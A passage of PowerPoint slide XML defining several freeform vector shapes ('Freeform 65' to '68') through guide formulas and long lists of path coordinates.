                      <a:lnTo>
                        <a:pt x="158" y="131"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="158" y="131"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="147" y="136"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="132" y="152"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="132" y="152"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="121" y="173"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="121" y="194"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="121" y="194"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="121" y="215"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="132" y="236"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="132" y="236"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="152" y="257"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="179" y="278"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="179" y="278"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="247" y="325"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="247" y="325"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="320" y="373"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="320" y="373"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="352" y="388"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="378" y="399"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="378" y="399"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="399" y="404"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="420" y="399"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="420" y="399"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="436" y="388"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="452" y="373"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="452" y="373"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="457" y="357"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="463" y="341"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="457" y="325"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="452" y="315"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="452" y="315"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="441" y="294"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="426" y="278"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="378" y="241"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="457" y="131"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="457" y="131"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="499" y="163"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="530" y="194"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="557" y="226"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="567" y="262"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="567" y="262"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="573" y="304"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="567" y="341"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="552" y="388"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="525" y="430"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="525" y="430"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="493" y="472"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="463" y="504"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="463" y="504"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="426" y="525"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="383" y="530"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="383" y="530"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="342" y="530"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="289" y="514"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="289" y="514"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="231" y="488"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="163" y="446"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="163" y="446"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="100" y="399"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="52" y="351"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="52" y="351"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="22" y="304"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="5" y="262"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="5" y="262"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="220"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="5" y="178"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="5" y="178"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="22" y="136"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="48" y="94"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="48" y="94"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="74" y="57"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="111" y="31"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="142" y="10"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="179" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="179" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="216" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="258" y="10"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="299" y="26"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="336" y="47"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="263" y="163"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="263" y="163"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="226" y="142"/>
                      </a:ln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0" name="Freeform 65"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="7196138" y="4975225"/>
                  <a:ext cx="249237" cy="217488"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 567 w 694"/>
                    <a:gd name="T1" fmla="*/ 367 h 604"/>
                    <a:gd name="T2" fmla="*/ 567 w 694"/>
                    <a:gd name="T3" fmla="*/ 367 h 604"/>
                    <a:gd name="T4" fmla="*/ 588 w 694"/>
                    <a:gd name="T5" fmla="*/ 409 h 604"/>
                    <a:gd name="T6" fmla="*/ 588 w 694"/>
                    <a:gd name="T7" fmla="*/ 424 h 604"/>
                    <a:gd name="T8" fmla="*/ 588 w 694"/>
                    <a:gd name="T9" fmla="*/ 446 h 604"/>
                    <a:gd name="T10" fmla="*/ 588 w 694"/>
                    <a:gd name="T11" fmla="*/ 446 h 604"/>
                    <a:gd name="T12" fmla="*/ 583 w 694"/>
                    <a:gd name="T13" fmla="*/ 488 h 604"/>
                    <a:gd name="T14" fmla="*/ 562 w 694"/>
                    <a:gd name="T15" fmla="*/ 530 h 604"/>
                    <a:gd name="T16" fmla="*/ 562 w 694"/>
                    <a:gd name="T17" fmla="*/ 530 h 604"/>
                    <a:gd name="T18" fmla="*/ 547 w 694"/>
                    <a:gd name="T19" fmla="*/ 556 h 604"/>
                    <a:gd name="T20" fmla="*/ 525 w 694"/>
                    <a:gd name="T21" fmla="*/ 577 h 604"/>
                    <a:gd name="T22" fmla="*/ 504 w 694"/>
                    <a:gd name="T23" fmla="*/ 593 h 604"/>
                    <a:gd name="T24" fmla="*/ 478 w 694"/>
                    <a:gd name="T25" fmla="*/ 603 h 604"/>
                    <a:gd name="T26" fmla="*/ 478 w 694"/>
                    <a:gd name="T27" fmla="*/ 603 h 604"/>
                    <a:gd name="T28" fmla="*/ 452 w 694"/>
                    <a:gd name="T29" fmla="*/ 603 h 604"/>
                    <a:gd name="T30" fmla="*/ 426 w 694"/>
                    <a:gd name="T31" fmla="*/ 603 h 604"/>
                    <a:gd name="T32" fmla="*/ 394 w 694"/>
                    <a:gd name="T33" fmla="*/ 593 h 604"/>
                    <a:gd name="T34" fmla="*/ 357 w 694"/>
                    <a:gd name="T35" fmla="*/ 571 h 604"/>
                    <a:gd name="T36" fmla="*/ 0 w 694"/>
                    <a:gd name="T37" fmla="*/ 367 h 604"/>
                    <a:gd name="T38" fmla="*/ 69 w 694"/>
                    <a:gd name="T39" fmla="*/ 241 h 604"/>
                    <a:gd name="T40" fmla="*/ 404 w 694"/>
                    <a:gd name="T41" fmla="*/ 435 h 604"/>
                    <a:gd name="T42" fmla="*/ 404 w 694"/>
                    <a:gd name="T43" fmla="*/ 435 h 604"/>
                    <a:gd name="T44" fmla="*/ 436 w 694"/>
                    <a:gd name="T45" fmla="*/ 451 h 604"/>
                    <a:gd name="T46" fmla="*/ 462 w 694"/>
                    <a:gd name="T47" fmla="*/ 451 h 604"/>
                    <a:gd name="T48" fmla="*/ 462 w 694"/>
                    <a:gd name="T49" fmla="*/ 451 h 604"/>
                    <a:gd name="T50" fmla="*/ 483 w 694"/>
                    <a:gd name="T51" fmla="*/ 441 h 604"/>
                    <a:gd name="T52" fmla="*/ 504 w 694"/>
                    <a:gd name="T53" fmla="*/ 420 h 604"/>
                    <a:gd name="T54" fmla="*/ 504 w 694"/>
                    <a:gd name="T55" fmla="*/ 420 h 604"/>
                    <a:gd name="T56" fmla="*/ 510 w 694"/>
                    <a:gd name="T57" fmla="*/ 404 h 604"/>
                    <a:gd name="T58" fmla="*/ 515 w 694"/>
                    <a:gd name="T59" fmla="*/ 388 h 604"/>
                    <a:gd name="T60" fmla="*/ 515 w 694"/>
                    <a:gd name="T61" fmla="*/ 372 h 604"/>
                    <a:gd name="T62" fmla="*/ 510 w 694"/>
                    <a:gd name="T63" fmla="*/ 362 h 604"/>
                    <a:gd name="T64" fmla="*/ 504 w 694"/>
                    <a:gd name="T65" fmla="*/ 346 h 604"/>
                    <a:gd name="T66" fmla="*/ 494 w 694"/>
                    <a:gd name="T67" fmla="*/ 330 h 604"/>
                    <a:gd name="T68" fmla="*/ 462 w 694"/>
                    <a:gd name="T69" fmla="*/ 309 h 604"/>
                    <a:gd name="T70" fmla="*/ 136 w 694"/>
                    <a:gd name="T71" fmla="*/ 120 h 604"/>
                    <a:gd name="T72" fmla="*/ 210 w 694"/>
                    <a:gd name="T73" fmla="*/ 0 h 604"/>
                    <a:gd name="T74" fmla="*/ 693 w 694"/>
                    <a:gd name="T75" fmla="*/ 277 h 604"/>
                    <a:gd name="T76" fmla="*/ 625 w 694"/>
                    <a:gd name="T77" fmla="*/ 398 h 604"/>
                    <a:gd name="T78" fmla="*/ 567 w 694"/>
                    <a:gd name="T79" fmla="*/ 362 h 604"/>
                    <a:gd name="T80" fmla="*/ 567 w 694"/>
                    <a:gd name="T81" fmla="*/ 367 h 6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694" h="604">
                      <a:moveTo>
                        <a:pt x="567" y="367"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="567" y="367"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="588" y="409"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="588" y="424"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="588" y="446"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="588" y="446"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="583" y="488"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="562" y="530"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="562" y="530"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="547" y="556"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="525" y="577"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="504" y="593"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="478" y="603"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="478" y="603"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="452" y="603"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="426" y="603"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="394" y="593"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="357" y="571"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="367"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="69" y="241"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="404" y="435"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="404" y="435"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="436" y="451"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="462" y="451"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="462" y="451"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="483" y="441"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="504" y="420"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="504" y="420"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="510" y="404"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="515" y="388"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="515" y="372"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="510" y="362"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="504" y="346"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="494" y="330"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="462" y="309"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="136" y="120"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="210" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="693" y="277"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="625" y="398"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="567" y="362"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="567" y="367"/>
                      </a:ln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1" name="Freeform 66"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="7288213" y="4848225"/>
                  <a:ext cx="204787" cy="185738"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 62 w 567"/>
                    <a:gd name="T1" fmla="*/ 141 h 515"/>
                    <a:gd name="T2" fmla="*/ 130 w 567"/>
                    <a:gd name="T3" fmla="*/ 178 h 515"/>
                    <a:gd name="T4" fmla="*/ 130 w 567"/>
                    <a:gd name="T5" fmla="*/ 173 h 515"/>
                    <a:gd name="T6" fmla="*/ 130 w 567"/>
                    <a:gd name="T7" fmla="*/ 173 h 515"/>
                    <a:gd name="T8" fmla="*/ 110 w 567"/>
                    <a:gd name="T9" fmla="*/ 136 h 515"/>
                    <a:gd name="T10" fmla="*/ 94 w 567"/>
                    <a:gd name="T11" fmla="*/ 99 h 515"/>
                    <a:gd name="T12" fmla="*/ 94 w 567"/>
                    <a:gd name="T13" fmla="*/ 99 h 515"/>
                    <a:gd name="T14" fmla="*/ 94 w 567"/>
                    <a:gd name="T15" fmla="*/ 78 h 515"/>
                    <a:gd name="T16" fmla="*/ 94 w 567"/>
                    <a:gd name="T17" fmla="*/ 58 h 515"/>
                    <a:gd name="T18" fmla="*/ 99 w 567"/>
                    <a:gd name="T19" fmla="*/ 41 h 515"/>
                    <a:gd name="T20" fmla="*/ 104 w 567"/>
                    <a:gd name="T21" fmla="*/ 21 h 515"/>
                    <a:gd name="T22" fmla="*/ 104 w 567"/>
                    <a:gd name="T23" fmla="*/ 21 h 515"/>
                    <a:gd name="T24" fmla="*/ 115 w 567"/>
                    <a:gd name="T25" fmla="*/ 11 h 515"/>
                    <a:gd name="T26" fmla="*/ 115 w 567"/>
                    <a:gd name="T27" fmla="*/ 11 h 515"/>
                    <a:gd name="T28" fmla="*/ 120 w 567"/>
                    <a:gd name="T29" fmla="*/ 0 h 515"/>
                    <a:gd name="T30" fmla="*/ 241 w 567"/>
                    <a:gd name="T31" fmla="*/ 58 h 515"/>
                    <a:gd name="T32" fmla="*/ 241 w 567"/>
                    <a:gd name="T33" fmla="*/ 58 h 515"/>
                    <a:gd name="T34" fmla="*/ 230 w 567"/>
                    <a:gd name="T35" fmla="*/ 78 h 515"/>
                    <a:gd name="T36" fmla="*/ 230 w 567"/>
                    <a:gd name="T37" fmla="*/ 78 h 515"/>
                    <a:gd name="T38" fmla="*/ 220 w 567"/>
                    <a:gd name="T39" fmla="*/ 99 h 515"/>
                    <a:gd name="T40" fmla="*/ 220 w 567"/>
                    <a:gd name="T41" fmla="*/ 99 h 515"/>
                    <a:gd name="T42" fmla="*/ 209 w 567"/>
                    <a:gd name="T43" fmla="*/ 131 h 515"/>
                    <a:gd name="T44" fmla="*/ 209 w 567"/>
                    <a:gd name="T45" fmla="*/ 131 h 515"/>
                    <a:gd name="T46" fmla="*/ 209 w 567"/>
                    <a:gd name="T47" fmla="*/ 152 h 515"/>
                    <a:gd name="T48" fmla="*/ 209 w 567"/>
                    <a:gd name="T49" fmla="*/ 173 h 515"/>
                    <a:gd name="T50" fmla="*/ 209 w 567"/>
                    <a:gd name="T51" fmla="*/ 173 h 515"/>
                    <a:gd name="T52" fmla="*/ 214 w 567"/>
                    <a:gd name="T53" fmla="*/ 188 h 515"/>
                    <a:gd name="T54" fmla="*/ 225 w 567"/>
                    <a:gd name="T55" fmla="*/ 210 h 515"/>
                    <a:gd name="T56" fmla="*/ 225 w 567"/>
                    <a:gd name="T57" fmla="*/ 210 h 515"/>
                    <a:gd name="T58" fmla="*/ 241 w 567"/>
                    <a:gd name="T59" fmla="*/ 225 h 515"/>
                    <a:gd name="T60" fmla="*/ 262 w 567"/>
                    <a:gd name="T61" fmla="*/ 236 h 515"/>
                    <a:gd name="T62" fmla="*/ 566 w 567"/>
                    <a:gd name="T63" fmla="*/ 388 h 515"/>
                    <a:gd name="T64" fmla="*/ 498 w 567"/>
                    <a:gd name="T65" fmla="*/ 514 h 515"/>
                    <a:gd name="T66" fmla="*/ 0 w 567"/>
                    <a:gd name="T67" fmla="*/ 268 h 515"/>
                    <a:gd name="T68" fmla="*/ 62 w 567"/>
                    <a:gd name="T69" fmla="*/ 141 h 5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567" h="515">
                      <a:moveTo>
                        <a:pt x="62" y="141"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="130" y="178"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="130" y="173"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="130" y="173"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="110" y="136"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="94" y="99"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="94" y="99"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="94" y="78"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="94" y="58"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="99" y="41"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="104" y="21"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="104" y="21"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="115" y="11"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="115" y="11"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="120" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="241" y="58"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="241" y="58"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="230" y="78"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="230" y="78"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="220" y="99"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="220" y="99"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="209" y="131"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="209" y="131"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="209" y="152"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="209" y="173"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="209" y="173"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="214" y="188"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="225" y="210"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="225" y="210"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="241" y="225"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="262" y="236"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="566" y="388"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="498" y="514"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="268"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="62" y="141"/>
                      </a:ln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2" name="Freeform 67"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="7278688" y="4759325"/>
                  <a:ext cx="268287" cy="158750"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 57 w 746"/>
                    <a:gd name="T1" fmla="*/ 0 h 442"/>
                    <a:gd name="T2" fmla="*/ 174 w 746"/>
                    <a:gd name="T3" fmla="*/ 52 h 442"/>
                    <a:gd name="T4" fmla="*/ 110 w 746"/>
                    <a:gd name="T5" fmla="*/ 184 h 442"/>
                    <a:gd name="T6" fmla="*/ 0 w 746"/>
                    <a:gd name="T7" fmla="*/ 131 h 442"/>
                    <a:gd name="T8" fmla="*/ 57 w 746"/>
                    <a:gd name="T9" fmla="*/ 0 h 442"/>
                    <a:gd name="T10" fmla="*/ 231 w 746"/>
                    <a:gd name="T11" fmla="*/ 79 h 442"/>
                    <a:gd name="T12" fmla="*/ 745 w 746"/>
                    <a:gd name="T13" fmla="*/ 310 h 442"/>
                    <a:gd name="T14" fmla="*/ 682 w 746"/>
                    <a:gd name="T15" fmla="*/ 441 h 442"/>
                    <a:gd name="T16" fmla="*/ 174 w 746"/>
                    <a:gd name="T17" fmla="*/ 210 h 442"/>
                    <a:gd name="T18" fmla="*/ 231 w 746"/>
                    <a:gd name="T19" fmla="*/ 79 h 4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746" h="442">
                      <a:moveTo>
                        <a:pt x="57" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="174" y="52"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="110" y="184"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="131"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="57" y="0"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="231" y="79"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="745" y="310"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="682" y="441"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="174" y="210"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="231" y="7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3" name="Freeform 68"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="7327900" y="4668838"/>
                  <a:ext cx="269875" cy="141287"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 52 w 751"/>
                    <a:gd name="T1" fmla="*/ 21 h 394"/>
                    <a:gd name="T2" fmla="*/ 199 w 751"/>
                    <a:gd name="T3" fmla="*/ 79 h 394"/>
                    <a:gd name="T4" fmla="*/ 231 w 751"/>
                    <a:gd name="T5" fmla="*/ 0 h 394"/>
                    <a:gd name="T6" fmla="*/ 325 w 751"/>
                    <a:gd name="T7" fmla="*/ 37 h 394"/>
                    <a:gd name="T8" fmla="*/ 294 w 751"/>
                    <a:gd name="T9" fmla="*/ 116 h 394"/>
                    <a:gd name="T10" fmla="*/ 572 w 751"/>
                    <a:gd name="T11" fmla="*/ 231 h 394"/>
                    <a:gd name="T12" fmla="*/ 572 w 751"/>
                    <a:gd name="T13" fmla="*/ 231 h 394"/>
                    <a:gd name="T14" fmla="*/ 598 w 751"/>
                    <a:gd name="T15" fmla="*/ 236 h 394"/>
                    <a:gd name="T16" fmla="*/ 619 w 751"/>
                    <a:gd name="T17" fmla="*/ 236 h 394"/>
                    <a:gd name="T18" fmla="*/ 619 w 751"/>
                    <a:gd name="T19" fmla="*/ 236 h 394"/>
                    <a:gd name="T20" fmla="*/ 635 w 751"/>
                    <a:gd name="T21" fmla="*/ 226 h 394"/>
                    <a:gd name="T22" fmla="*/ 651 w 751"/>
                    <a:gd name="T23" fmla="*/ 205 h 394"/>
                    <a:gd name="T24" fmla="*/ 651 w 751"/>
                    <a:gd name="T25" fmla="*/ 205 h 394"/>
                    <a:gd name="T26" fmla="*/ 656 w 751"/>
                    <a:gd name="T27" fmla="*/ 189 h 394"/>
                    <a:gd name="T28" fmla="*/ 656 w 751"/>
                    <a:gd name="T29" fmla="*/ 189 h 394"/>
                    <a:gd name="T30" fmla="*/ 661 w 751"/>
                    <a:gd name="T31" fmla="*/ 173 h 394"/>
                    <a:gd name="T32" fmla="*/ 750 w 751"/>
                    <a:gd name="T33" fmla="*/ 210 h 394"/>
                    <a:gd name="T34" fmla="*/ 750 w 751"/>
                    <a:gd name="T35" fmla="*/ 210 h 394"/>
                    <a:gd name="T36" fmla="*/ 735 w 751"/>
                    <a:gd name="T37" fmla="*/ 257 h 394"/>
                    <a:gd name="T38" fmla="*/ 735 w 751"/>
                    <a:gd name="T39" fmla="*/ 257 h 394"/>
                    <a:gd name="T40" fmla="*/ 719 w 751"/>
                    <a:gd name="T41" fmla="*/ 299 h 394"/>
                    <a:gd name="T42" fmla="*/ 719 w 751"/>
                    <a:gd name="T43" fmla="*/ 299 h 394"/>
                    <a:gd name="T44" fmla="*/ 703 w 751"/>
                    <a:gd name="T45" fmla="*/ 336 h 394"/>
                    <a:gd name="T46" fmla="*/ 687 w 751"/>
                    <a:gd name="T47" fmla="*/ 362 h 394"/>
                    <a:gd name="T48" fmla="*/ 687 w 751"/>
                    <a:gd name="T49" fmla="*/ 362 h 394"/>
                    <a:gd name="T50" fmla="*/ 671 w 751"/>
                    <a:gd name="T51" fmla="*/ 378 h 394"/>
                    <a:gd name="T52" fmla="*/ 651 w 751"/>
                    <a:gd name="T53" fmla="*/ 389 h 394"/>
                    <a:gd name="T54" fmla="*/ 651 w 751"/>
                    <a:gd name="T55" fmla="*/ 389 h 394"/>
                    <a:gd name="T56" fmla="*/ 629 w 751"/>
                    <a:gd name="T57" fmla="*/ 393 h 394"/>
                    <a:gd name="T58" fmla="*/ 603 w 751"/>
                    <a:gd name="T59" fmla="*/ 389 h 394"/>
                    <a:gd name="T60" fmla="*/ 603 w 751"/>
                    <a:gd name="T61" fmla="*/ 389 h 394"/>
                    <a:gd name="T62" fmla="*/ 572 w 751"/>
                    <a:gd name="T63" fmla="*/ 383 h 394"/>
                    <a:gd name="T64" fmla="*/ 535 w 751"/>
                    <a:gd name="T65" fmla="*/ 367 h 394"/>
                    <a:gd name="T66" fmla="*/ 236 w 751"/>
                    <a:gd name="T67" fmla="*/ 247 h 394"/>
                    <a:gd name="T68" fmla="*/ 210 w 751"/>
                    <a:gd name="T69" fmla="*/ 315 h 394"/>
                    <a:gd name="T70" fmla="*/ 120 w 751"/>
                    <a:gd name="T71" fmla="*/ 278 h 394"/>
                    <a:gd name="T72" fmla="*/ 147 w 751"/>
                    <a:gd name="T73" fmla="*/ 210 h 394"/>
                    <a:gd name="T74" fmla="*/ 0 w 751"/>
                    <a:gd name="T75" fmla="*/ 152 h 394"/>
                    <a:gd name="T76" fmla="*/ 52 w 751"/>
                    <a:gd name="T77" fmla="*/ 21 h 3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751" h="394">
                      <a:moveTo>
                        <a:pt x="52" y="21"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="199" y="79"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="231" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="325" y="37"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="294" y="116"/>
